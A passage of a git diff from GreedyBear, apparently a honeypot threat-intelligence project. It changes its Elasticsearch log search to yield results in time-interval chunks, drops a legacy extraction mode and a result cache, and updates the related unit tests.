-            honeypot_name: The  name/type of the honeypot to check for hits.
+            honeypot_name: The name/type of the honeypot to check for hits.
 
         Returns:
             True if at least one hit was recorded for the specified honeypot within
             the time window, False otherwise.
         """
         search = Search(using=self.elastic_client, index="logstash-*")
-        q = self._standard_query(minutes_back_to_lookup)
+        window_start, window_end = get_time_window(datetime.now(), minutes_back_to_lookup)
+        q = Q("range", **{"@timestamp": {"gte": window_start, "lt": window_end}})
         search = search.query(q)
         search = search.filter("term", **{"type.keyword": honeypot_name})
         return search.count() > 0
 
-    def search(self, minutes_back_to_lookup: int) -> list:
+    def search(self, minutes_back_to_lookup: int) -> Iterator[list]:
         """
-        Search for log entries within a specified time window.
-
-        Returns cached results if available for the given lookback period.
-        Uses legacy or modern query format based on LEGACY_EXTRACTION setting.
+        Search for log entries within a specified time window, yielding results
+        in chunks of at most EXTRACTION_INTERVAL minutes.
 
         Args:
             minutes_back_to_lookup: Number of minutes to look back from the current time.
 
-        Returns:
-            list: Log entries sorted by @timestamp, containing only REQUIRED_FIELDS.
+        Yields:
+            list: Log entries sorted by @timestamp for each chunk, containing only REQUIRED_FIELDS.
 
         Raises:
             ElasticServerDownError: If Elasticsearch is unreachable.
         """
-        if minutes_back_to_lookup in self.search_cache:
-            self.log.debug("fetching elastic search result from cache")
-            return self.search_cache[minutes_back_to_lookup]
-
         self._healthcheck()
-        search = Search(using=self.elastic_client, index="logstash-*")
         self.log.debug(f"minutes_back_to_lookup: {minutes_back_to_lookup}")
-        if LEGACY_EXTRACTION:
-            self.log.debug("querying elastic using legacy method")
-            gte_date = f"now-{minutes_back_to_lookup}m/m"
-            q = Q(
-                "bool",
-                should=[
-                    Q("range", timestamp={"gte": gte_date, "lte": "now/m"}),
-                    Q("range", end_time={"gte": gte_date, "lte": "now/m"}),
-                    Q("range", **{"@timestamp": {"gte": gte_date, "lte": "now/m"}}),
-                ],
-                minimum_should_match=1,
-            )
-        else:
-            q = self._standard_query(minutes_back_to_lookup)
-
-        search = search.query(q)
-        search.source(REQUIRED_FIELDS)
-        result = list(search.scan())
-        self.log.debug(f"found {len(result)} hits")
-
-        result.sort(key=lambda hit: hit["@timestamp"])
-        self.search_cache[minutes_back_to_lookup] = result
-        return result
-
-    def _standard_query(self, minutes_back_to_lookup: int) -> Q:
-        """
-        Builds an Elasticsearch query that filters documents based on their
-        @timestamp field, searching backwards from the current time for the
-        specified number of minutes.
-
-        Args:
-            minutes_back_to_lookup: Number of minutes to look back from the
-                current time. Defines the size of the time window to search.
-
-        Returns:
-            Q: An elasticsearch-dsl Query object with a range filter on the
-            @timestamp field. The range spans from (now - minutes_back_to_lookup)
-            to now.
-        """
-        self.log.debug("querying elastic using standard method")
         window_start, window_end = get_time_window(datetime.now(), minutes_back_to_lookup)
-        self.log.debug(f"time window: {window_start} - {window_end}")
-        return Q("range", **{"@timestamp": {"gte": window_start, "lt": window_end}})
+        chunk_start = window_start
+        while chunk_start < window_end:
+            self.log.debug("querying elastic")
+            chunk_end = min(chunk_start + timedelta(minutes=EXTRACTION_INTERVAL), window_end)
+            self.log.debug(f"time window: {chunk_start} - {chunk_end}")
+            search = Search(using=self.elastic_client, index="logstash-*")
+            q = Q("range", **{"@timestamp": {"gte": chunk_start, "lt": chunk_end}})
+            search = search.query(q)
+            search.source(REQUIRED_FIELDS)
+            result = list(search.scan())
+            self.log.debug(f"found {len(result)} hits")
+            result.sort(key=lambda hit: hit["@timestamp"])
+            yield result
+            chunk_start = chunk_end
 
     def _healthcheck(self):
         """
diff --git a/greedybear/settings.py b/greedybear/settings.py
index e07cdfdf..d197280f 100644
--- a/greedybear/settings.py
+++ b/greedybear/settings.py
@@ -408,7 +408,6 @@
         EMAIL_USE_SSL = os.environ.get("EMAIL_USE_SSL", "False") == "True"
 
 
-LEGACY_EXTRACTION = os.environ.get("LEGACY_EXTRACTION", "False") == "True"
 EXTRACTION_INTERVAL = int(os.environ.get("EXTRACTION_INTERVAL", 10))
 INITIAL_EXTRACTION_TIMESPAN = int(os.environ.get("INITIAL_EXTRACTION_TIMESPAN", 60 * 24 * 3))  # 3 days
 CLUSTER_COWRIE_COMMAND_SEQUENCES = os.environ.get("CLUSTER_COWRIE_COMMAND_SEQUENCES", "False") == "True"
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py b/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
index c85b264d..d37e9dd1 100644
--- a/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
@@ -37,7 +37,7 @@ def test_cowrie_extracts_scanner_ioc(self, mock_session_repo, mock_scores):
                 }
             ),
         ]
-        pipeline.elastic_repo.search.return_value = cowrie_hits
+        pipeline.elastic_repo.search.return_value = [cowrie_hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
         pipeline.ioc_repo.get_ioc_by_name.return_value = None  # New IOC
@@ -75,7 +75,7 @@ def test_cowrie_extracts_login_credentials(self, mock_session_repo, mock_scores)
                 }
             ),
         ]
-        pipeline.elastic_repo.search.return_value = cowrie_hits
+        pipeline.elastic_repo.search.return_value = [cowrie_hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
         pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -111,7 +111,7 @@ def test_log4pot_extracts_exploit_ioc(self, mock_scores):
                 }
             ),
         ]
-        pipeline.elastic_repo.search.return_value = log4pot_hits
+        pipeline.elastic_repo.search.return_value = [log4pot_hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
         pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -141,7 +141,7 @@ def test_log4pot_non_exploit_skipped(self, mock_scores):
                 }
             ),
         ]
-        pipeline.elastic_repo.search.return_value = log4pot_hits
+        pipeline.elastic_repo.search.return_value = [log4pot_hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
         pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -176,7 +176,7 @@ def test_unknown_honeypot_uses_generic_strategy(self, mock_scores):
                 }
             ),
         ]
-        pipeline.elastic_repo.search.return_value = unknown_hits
+        pipeline.elastic_repo.search.return_value = [unknown_hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
         pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -232,7 +232,7 @@ def test_mixed_honeypots_use_correct_strategies(self, mock_session_repo, mock_sc
                 }
             ),
         ]
-        pipeline.elastic_repo.search.return_value = mixed_hits
+        pipeline.elastic_repo.search.return_value = [mixed_hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
         pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -269,7 +269,7 @@ def test_strategy_exception_logged_and_continues(self, mock_scores):
                 }
             ),
         ]
-        pipeline.elastic_repo.search.return_value = hits
+        pipeline.elastic_repo.search.return_value = [hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
 
@@ -303,7 +303,7 @@ def test_scoring_called_when_iocs_extracted(self, mock_scores):
                 }
             ),
         ]
-        pipeline.elastic_repo.search.return_value = hits
+        pipeline.elastic_repo.search.return_value = [hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
         pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -357,7 +357,7 @@ def test_cowrie_ioc_content_verified(self, mock_scores):
                 }
             ),
         ]
-        pipeline.elastic_repo.search.return_value = hits
+        pipeline.elastic_repo.search.return_value = [hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
         pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -419,7 +419,7 @@ def test_multiple_honeypots_ioc_content_verified(self, mock_scores):
                 }
             ),
         ]
-        pipeline.elastic_repo.search.return_value = hits
+        pipeline.elastic_repo.search.return_value = [hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
         pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -478,7 +478,7 @@ def test_ioc_scanner_field_contains_honeypot_type(self, mock_scores):
                 }
             ),
         ]
-        pipeline.elastic_repo.search.return_value = hits
+        pipeline.elastic_repo.search.return_value = [hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
         pipeline.ioc_repo.get_ioc_by_name.return_value = None
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py b/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py
index c313f691..b9dcdbec 100644
--- a/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py
@@ -39,7 +39,7 @@ def test_partial_strategy_success(self, mock_factory, mock_scores):
             MockElasticHit({"src_ip": "1.1.1.1", "type": "FailingHoneypot"}),
             MockElasticHit({"src_ip": "2.2.2.2", "type": "SuccessHoneypot"}),
         ]
-        pipeline.elastic_repo.search.return_value = hits
+        pipeline.elastic_repo.search.return_value = [hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
 
@@ -85,7 +85,7 @@ def test_large_batch_of_hits_with_real_strategy(self, mock_scores):
             )
             for i in range(100)
         ]
-        pipeline.elastic_repo.search.return_value = hits
+        pipeline.elastic_repo.search.return_value = [hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
         pipeline.ioc_repo.get_ioc_by_name.return_value = None
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py b/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py
index 18eed9b3..c61e6346 100644
--- a/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py
@@ -34,9 +34,11 @@ def test_skips_hits_without_src_ip(self, mock_factory, mock_scores):
         """Hits without src_ip should be skipped."""
         pipeline = self._create_pipeline_with_mocks()
         pipeline.elastic_repo.search.return_value = [
-            MockElasticHit({"type": "Cowrie"}),  # missing src_ip
-            MockElasticHit({"src_ip": "", "type": "Cowrie"}),  # empty src_ip
-            MockElasticHit({"src_ip": "   ", "type": "Cowrie"}),  # whitespace-only src_ip
+            [
+                MockElasticHit({"type": "Cowrie"}),  # missing src_ip
+                MockElasticHit({"src_ip": "", "type": "Cowrie"}),  # empty src_ip
+                MockElasticHit({"src_ip": "   ", "type": "Cowrie"}),  # whitespace-only src_ip
+            ]
         ]
         pipeline.ioc_repo.is_empty.return_value = False
 
@@ -51,9 +53,11 @@ def test_skips_hits_without_type(self, mock_factory, mock_scores):
         """Hits without type (honeypot) should be skipped."""
         pipeline = self._create_pipeline_with_mocks()
         pipeline.elastic_repo.search.return_value = [
-            MockElasticHit({"src_ip": "1.2.3.4"}),  # missing type
-            MockElasticHit({"src_ip": "1.2.3.4", "type": ""}),  # empty type
-            MockElasticHit({"src_ip": "1.2.3.4", "type": "   "}),  # whitespace-only type
+            [
+                MockElasticHit({"src_ip": "1.2.3.4"}),  # missing type
+                MockElasticHit({"src_ip": "1.2.3.4", "type": ""}),  # empty type
+                MockElasticHit({"src_ip": "1.2.3.4", "type": "   "}),  # whitespace-only type
+            ]
         ]
         pipeline.ioc_repo.is_empty.return_value = False
 
@@ -80,7 +84,6 @@ def test_handles_empty_search_result(self, mock_factory, mock_scores):
 class TestSensorExtraction(ExtractionPipelineTestCase):
     """Tests for sensor extraction from hits."""
 
-    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
     @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 10)
     @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
     @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
@@ -91,7 +94,7 @@ def test_extracts_sensor_from_hits(self, mock_factory, mock_scores):
         """
         pipeline = self._create_pipeline_with_mocks()
         pipeline.elastic_repo.search.return_value = [
-            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie", "t-pot_ip_ext": "10.0.0.1"}),
+            [MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie", "t-pot_ip_ext": "10.0.0.1"})],
         ]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = False  # Skip strategy for this test
@@ -120,7 +123,7 @@ def test_sensor_not_extracted_for_invalid_hits(self, mock_factory, mock_scores):
                 }
             ),
         ]
-        pipeline.elastic_repo.search.return_value = hits
+        pipeline.elastic_repo.search.return_value = [hits]
         pipeline.ioc_repo.is_empty.return_value = False
 
         pipeline.execute()
@@ -138,9 +141,11 @@ def test_groups_hits_by_honeypot_type(self, mock_factory, mock_scores):
         """Hits should be grouped by honeypot type before extraction."""
         pipeline = self._create_pipeline_with_mocks()
         pipeline.elastic_repo.search.return_value = [
-            MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
-            MockElasticHit({"src_ip": "5.6.7.8", "type": "Cowrie"}),
-            MockElasticHit({"src_ip": "9.10.11.12", "type": "Log4pot"}),
+            [
+                MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
+                MockElasticHit({"src_ip": "5.6.7.8", "type": "Cowrie"}),
+                MockElasticHit({"src_ip": "9.10.11.12", "type": "Log4pot"}),
+            ]
         ]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
@@ -178,7 +183,7 @@ def test_duplicate_honeypot_hits_grouped(self, mock_factory, mock_scores):
             MockElasticHit({"src_ip": "2.2.2.2", "type": "Cowrie"}),
             MockElasticHit({"src_ip": "3.3.3.3", "type": "Cowrie"}),
         ]
-        pipeline.elastic_repo.search.return_value = hits
+        pipeline.elastic_repo.search.return_value = [hits]
         pipeline.ioc_repo.is_empty.return_value = False
         pipeline.ioc_repo.is_ready_for_extraction.return_value = True
 
@@ -218,7 +223,7 @@ def test_honeypot_skipped_when_not_ready(self, mock_factory, mock_scores):
                 }
             ),
         ]
-        pipeline.elastic_repo.search.return_value = hits
+        pipeline.elastic_repo.search.return_value = [hits]
         pipeline.ioc_repo.is_empty.return_value = False
 
         # First honeypot disabled, second enabled
@@ -234,3 +239,110 @@ def test_honeypot_skipped_when_not_ready(self, mock_factory, mock_scores):
         self.assertEqual(result, 1)
         # Factory should only be called once (for EnabledHoneypot)
         mock_factory.return_value.get_strategy.assert_called_once_with("EnabledHoneypot")
+
+
+class TestMultiChunkProcessing(ExtractionPipelineTestCase):
+    """Tests for multi-chunk processing behavior."""
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_ioc_count_accumulated_across_chunks(self, mock_factory, mock_scores):
+        """IOC records from all chunks should be counted in the total."""
+        pipeline = self._create_pipeline_with_mocks()
+
+        chunk1 = [
+            MockElasticHit({"src_ip": "1.1.1.1", "type": "Cowrie"}),
+            MockElasticHit({"src_ip": "2.2.2.2", "type": "Cowrie"}),
+        ]
+        chunk2 = [
+            MockElasticHit({"src_ip": "3.3.3.3", "type": "Cowrie"}),
+        ]
+        chunk3 = [
+            MockElasticHit({"src_ip": "4.4.4.4", "type": "Cowrie"}),
+            MockElasticHit({"src_ip": "5.5.5.5", "type": "Cowrie"}),
+            MockElasticHit({"src_ip": "6.6.6.6", "type": "Cowrie"}),
+        ]
+        pipeline.elastic_repo.search.return_value = [chunk1, chunk2, chunk3]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        mock_strategy = MagicMock()
+        mock_strategy.ioc_records = []
+
+        def set_ioc_records(hits):
+            mock_strategy.ioc_records = [self._create_mock_ioc(h["src_ip"]) for h in hits]
+
+        mock_strategy.extract_from_hits.side_effect = set_ioc_records
+        mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+        result = pipeline.execute()
+
+        self.assertEqual(result, 6)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_scoring_called_per_chunk(self, mock_factory, mock_scores):
+        """UpdateScores should be called once per chunk that produces IOCs."""
+        pipeline = self._create_pipeline_with_mocks()
+
+        chunk_with_hits = [
+            MockElasticHit({"src_ip": "1.1.1.1", "type": "Cowrie"}),
+        ]
+        empty_chunk = []
+        pipeline.elastic_repo.search.return_value = [
+            chunk_with_hits,
+            empty_chunk,
+            chunk_with_hits,
+        ]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        mock_strategy = MagicMock()
+        mock_strategy.ioc_records = [self._create_mock_ioc("1.1.1.1")]
+        mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+        pipeline.execute()
+
+        self.assertEqual(mock_scores.return_value.score_only.call_count, 2)
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_factory_created_once_across_chunks(self, mock_factory, mock_scores):
+        """ExtractionStrategyFactory should be instantiated once, not per chunk."""
+        pipeline = self._create_pipeline_with_mocks()
+
+        chunk = [MockElasticHit({"src_ip": "1.1.1.1", "type": "Cowrie"})]
+        pipeline.elastic_repo.search.return_value = [chunk, chunk, chunk]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        mock_strategy = MagicMock()
+        mock_strategy.ioc_records = []
+        mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+        pipeline.execute()
+
+        mock_factory.assert_called_once()
+
+    @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+    @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+    def test_each_chunk_groups_hits_independently(self, mock_factory, mock_scores):
+        """Each chunk should group its own hits by honeypot type independently."""
+        pipeline = self._create_pipeline_with_mocks()
+
+        chunk1 = [MockElasticHit({"src_ip": "1.1.1.1", "type": "Cowrie"})]
+        chunk2 = [MockElasticHit({"src_ip": "2.2.2.2", "type": "Log4pot"})]
+        pipeline.elastic_repo.search.return_value = [chunk1, chunk2]
+        pipeline.ioc_repo.is_empty.return_value = False
+        pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+        mock_strategy = MagicMock()
+        mock_strategy.ioc_records = [self._create_mock_ioc()]
+        mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+        pipeline.execute()
+
+        calls = mock_factory.return_value.get_strategy.call_args_list
+        self.assertEqual(len(calls), 2)
+        self.assertEqual(calls[0][0][0], "Cowrie")
+        self.assertEqual(calls[1][0][0], "Log4pot")
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_init.py b/tests/greedybear/cronjobs/test_extraction_pipeline_init.py
index 18e81e60..9905454d 100644
--- a/tests/greedybear/cronjobs/test_extraction_pipeline_init.py
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_init.py
@@ -30,7 +30,6 @@ def test_initializes_repositories(self, mock_elastic, mock_ioc, mock_sensor):
 class TestMinutesBackToLookup(ExtractionTestCase):
     """Tests for the _minutes_back_to_lookup property."""
 
-    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
     @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
     @patch("greedybear.cronjobs.extraction.pipeline.INITIAL_EXTRACTION_TIMESPAN", 120)
     @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
@@ -47,7 +46,6 @@ def test_returns_initial_timespan_when_empty(self, mock_elastic, mock_ioc, mock_
 
         self.assertEqual(result, 120)
 
-    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
     @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
     @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
     @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
@@ -62,19 +60,3 @@ def test_returns_extraction_interval_when_not_empty(self, mock_elastic, mock_ioc
         result = pipeline._minutes_back_to_lookup
 
         self.assertEqual(result, 5)
-
-    @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", True)
-    @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
-    @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
-    @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
-    @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
-    def test_returns_11_for_legacy_extraction(self, mock_elastic, mock_ioc, mock_sensor):
-        """Should return 11 when LEGACY_EXTRACTION is enabled."""
-        from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
-
-        pipeline = ExtractionPipeline()
-        pipeline.ioc_repo.is_empty.return_value = False
-
-        result = pipeline._minutes_back_to_lookup
-
-        self.assertEqual(result, 11)
diff --git a/tests/test_elastic_repository.py b/tests/test_elastic_repository.py
index 54cd92ea..04b8e92d 100644
--- a/tests/test_elastic_repository.py
+++ b/tests/test_elastic_repository.py
@@ -1,5 +1,5 @@
-from datetime import datetime
-from unittest.mock import Mock, patch
+from datetime import datetime, timedelta
+from unittest.mock import Mock, call, patch
 
 from greedybear.cronjobs.repositories import ElasticRepository, get_time_window
 
@@ -18,38 +18,38 @@ def setUp(self):
 
         self.repo = ElasticRepository()
 
+    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
     @patch("greedybear.cronjobs.repositories.elastic.Search")
-    def test_has_honeypot_been_hit_returns_true_when_hits_exist(self, mock_search_class):
+    def test_has_honeypot_been_hit_returns_true_when_hits_exist(self, mock_search_class, mock_get_time_window):
         mock_search = Mock()
         mock_search_class.return_value = mock_search
-        mock_q = Mock()
-        with patch.object(self.repo, "_standard_query", return_value=mock_q):
-            mock_search.query.return_value = mock_search
-            mock_search.filter.return_value = mock_search
-            mock_search.count.return_value = 1
-
-            result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
-            self.assertTrue(result)
-            mock_search.query.assert_called_once_with(mock_q)
-            mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
-            mock_search.count.assert_called_once()
+        mock_search.query.return_value = mock_search
+        mock_search.filter.return_value = mock_search
+        mock_search.count.return_value = 1
+        mock_get_time_window.return_value = (datetime(2025, 1, 1), datetime(2025, 1, 1, 0, 10))
 
+        result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
+        self.assertTrue(result)
+        mock_search.query.assert_called_once()
+        mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
+        mock_search.count.assert_called_once()
+
+    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
     @patch("greedybear.cronjobs.repositories.elastic.Search")
-    def test_has_honeypot_been_hit_returns_false_when_no_hits(self, mock_search_class):
+    def test_has_honeypot_been_hit_returns_false_when_no_hits(self, mock_search_class, mock_get_time_window):
         mock_search = Mock()
         mock_search_class.return_value = mock_search
-        mock_q = Mock()
-        with patch.object(self.repo, "_standard_query", return_value=mock_q):
-            mock_search.query.return_value = mock_search
-            mock_search.filter.return_value = mock_search
-            mock_search.count.return_value = 0
+        mock_search.query.return_value = mock_search
+        mock_search.filter.return_value = mock_search
+        mock_search.count.return_value = 0
+        mock_get_time_window.return_value = (datetime(2025, 1, 1), datetime(2025, 1, 1, 0, 10))
 
-            result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
+        result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
 
-            self.assertFalse(result)
-            mock_search.query.assert_called_once_with(mock_q)
-            mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
-            mock_search.count.assert_called_once()
+        self.assertFalse(result)
+        mock_search.query.assert_called_once()
+        mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
+        mock_search.count.assert_called_once()
 
     def test_healthcheck_passes_when_ping_succeeds(self):
         self.mock_client.ping.return_value = True
@@ -62,9 +62,9 @@ def test_healthcheck_raises_when_ping_fails(self):
             self.repo._healthcheck()
         self.assertIn("not reachable", str(ctx.exception))
 
+    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
     @patch("greedybear.cronjobs.repositories.elastic.Search")
-    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
-    def test_search_returns_cached_list_not_generator(self, mock_search_class):
+    def test_search_yields_all_hits_across_chunks(self, mock_search_class, mock_get_time_window):
         mock_search = Mock()
         mock_search_class.return_value = mock_search
         mock_search.query.return_value = mock_search
@@ -72,15 +72,15 @@ def test_search_returns_cached_list_not_generator(self, mock_search_class):
 
         mock_hits = [{"name": f"hit{i}", "@timestamp": i} for i in range(20_000)]
         mock_search.scan.return_value = iter(mock_hits)
+        mock_get_time_window.return_value = (datetime(2025, 1, 1, 12, 0), datetime(2025, 1, 1, 12, 10))
 
-        first_iteration = list(self.repo.search(minutes_back_to_lookup=10))
-        second_iteration = list(self.repo.search(minutes_back_to_lookup=10))
-        self.assertEqual(len(first_iteration), 20_000)
-        self.assertEqual(len(second_iteration), 20_000)
+        chunks = list(self.repo.search(minutes_back_to_lookup=10))
+        all_hits = [hit for chunk in chunks for hit in chunk]
+        self.assertEqual(len(all_hits), 20_000)
 
+    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
     @patch("greedybear.cronjobs.repositories.elastic.Search")
-    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
-    def test_search_returns_ordered_list(self, mock_search_class):
+    def test_search_returns_ordered_hits_within_chunks(self, mock_search_class, mock_get_time_window):
         mock_search = Mock()
         mock_search_class.return_value = mock_search
         mock_search.query.return_value = mock_search
@@ -88,58 +88,152 @@ def test_search_returns_ordered_list(self, mock_search_class):
 
         mock_hits = [{"name": f"hit{i}", "@timestamp": i % 7} for i in range(20_000)]
         mock_search.scan.return_value = iter(mock_hits)
+        mock_get_time_window.return_value = (datetime(2025, 1, 1, 12, 0), datetime(2025, 1, 1, 12, 10))
 
-        result = list(self.repo.search(minutes_back_to_lookup=10))
-        is_ordered = all(a["@timestamp"] <= b["@timestamp"] for a, b in zip(result, result[1:], strict=False))
-        self.assertTrue(is_ordered)
+        chunks = list(self.repo.search(minutes_back_to_lookup=10))
+        for chunk in chunks:
+            is_ordered = all(a["@timestamp"] <= b["@timestamp"] for a, b in zip(chunk, chunk[1:], strict=False))
+            self.assertTrue(is_ordered)
 
     @patch("greedybear.cronjobs.repositories.elastic.Search")
-    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", True)
-    def test_search_legacy_mode_uses_relative_time(self, mock_search_class):
-        """Test legacy extraction uses relative time queries"""
+    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
+    def test_search_uses_time_window(self, mock_get_time_window, mock_search_class):
+        """Test extraction uses get_time_window"""
         mock_search = Mock()
         mock_search_class.return_value = mock_search
         mock_search.query.return_value = mock_search
         mock_search.source.return_value = mock_search
         mock_search.scan.return_value = iter([])
 
-        # Verify query was called (legacy mode uses different query structure)
-        self.repo.search(minutes_back_to_lookup=11)
-        mock_search.query.assert_called_once()
+        window_start = datetime(2025, 1, 1, 12, 0, 0)
+        window_end = datetime(2025, 1, 1, 12, 10, 0)
+        mock_get_time_window.return_value = (window_start, window_end)
+
+        list(self.repo.search(minutes_back_to_lookup=10))
+
+        mock_get_time_window.assert_called_once()
+
+
+class TestSearchChunking(CustomTestCase):
+    """Tests for the chunked iteration behavior of search()."""
 
+    def setUp(self):
+        self.mock_client = Mock()
+        self.mock_client.ping.return_value = True
+
+        patcher = patch("greedybear.cronjobs.repositories.elastic.settings")
+        self.mock_settings = patcher.start()
+        self.mock_settings.ELASTIC_CLIENT = self.mock_client
+        self.addCleanup(patcher.stop)
+
+        self.repo = ElasticRepository()
+
+    @patch("greedybear.cronjobs.repositories.elastic.EXTRACTION_INTERVAL", 10)
+    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
     @patch("greedybear.cronjobs.repositories.elastic.Search")
-    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
+    def test_produces_correct_number_of_chunks(self, mock_search_class, mock_get_time_window):
+        """A 30-minute window with 10-minute interval should yield 3 chunks."""
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_search.query.return_value = mock_search
+        mock_search.source.return_value = mock_search
+        mock_search.scan.return_value = iter([])
+
+        mock_get_time_window.return_value = (
+            datetime(2025, 1, 1, 12, 0),
+            datetime(2025, 1, 1, 12, 30),
+        )
+
+        chunks = list(self.repo.search(minutes_back_to_lookup=30))
+
+        self.assertEqual(len(chunks), 3)
+
+    @patch("greedybear.cronjobs.repositories.elastic.EXTRACTION_INTERVAL", 10)
     @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
-    def test_search_non_legacy_uses_time_window(self, mock_get_time_window, mock_search_class):
-        """Test non-legacy extraction uses get_time_window"""
+    @patch("greedybear.cronjobs.repositories.elastic.Q")
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
